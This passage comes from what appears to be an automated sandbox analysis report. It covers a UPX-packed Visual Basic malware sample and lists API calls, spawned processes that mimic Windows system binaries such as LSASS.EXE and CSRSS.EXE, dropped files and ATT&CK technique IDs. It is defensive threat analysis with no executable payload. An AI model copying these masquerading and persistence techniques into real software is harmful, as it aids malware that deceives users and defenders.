\"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003940)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003940)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003940)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003940)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003940)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003940)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003276)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003836)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004428)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004428)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004428)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004428)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004428)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004428)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004408)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004408)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004408)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004408)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000884)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000884)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000884)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000884)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000884)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000884)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000284)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002472)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004444)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003268)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77480000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00006008)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006060)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005968)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006128)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005484)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006080)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004168)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004244)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006064)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003992)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003456)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003436)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000132)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004208)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003180)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004384)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003592)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00006008)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006060)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005968)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006128)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005484)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006080)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004168)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004244)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006064)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003992)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003456)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003436)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000132)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004208)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003180)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004384)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003592)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" was detected as \"UPX\" and name: \"Packer\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS .exe\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS .exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS .exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C469.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C469.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C469.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C7EE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C7EE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C7EE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C717.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C717.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C717.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C46B.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C46B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C46B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C719.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C719.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C719.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e7c6a@ADVAPI32.dll\"\n \"0e000f00703f7c6a@ADVAPI32.dll\"\n \"0e000f00cc3f7c6a@ADVAPI32.dll\"\n \"11001200b4477c6a@ADVAPI32.dll\"\n \"1100120048487c6a@ADVAPI32.dll\"\n \"120013008c487c6a@ADVAPI32.dll\"\n \"12001300e4487c6a@ADVAPI32.dll\"\n \"14001500386e7c6a@ADVAPI32.dll\"\n \"14001500506e7c6a@ADVAPI32.dll\"\n \"14001500686e7c6a@ADVAPI32.dll\"\n \"17001800806e7c6a@ADVAPI32.dll\"\n \"0d000e00986e7c6a@ADVAPI32.dll\"\n \"11001200a86e7c6a@ADVAPI32.dll\"\n \"11001200bc6e7c6a@ADVAPI32.dll\"\n \"0f001000fc6f7c6a@ADVAPI32.dll\"\n \"140015003c707c6a@ADVAPI32.dll\"\n \"1400150054707c6a@ADVAPI32.dll\"\n \"0c000d009c707c6a@ADVAPI32.dll\"\n \"0c000d00ac707c6a@ADVAPI32.dll\"\n \"0e000f00bc707c6a@ADVAPI32.dll\"\n \"0e000f00cc707c6a@ADVAPI32.dll\"\n \"0b000c00dc707c6a@ADVAPI32.dll\"\n \"1800190014737c6a@RPCRT4.dll\"\n \"1300140040737c6a@RPCRT4.dll\"\n \"1400150054737c6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006060)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006128)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005984)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006064)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter 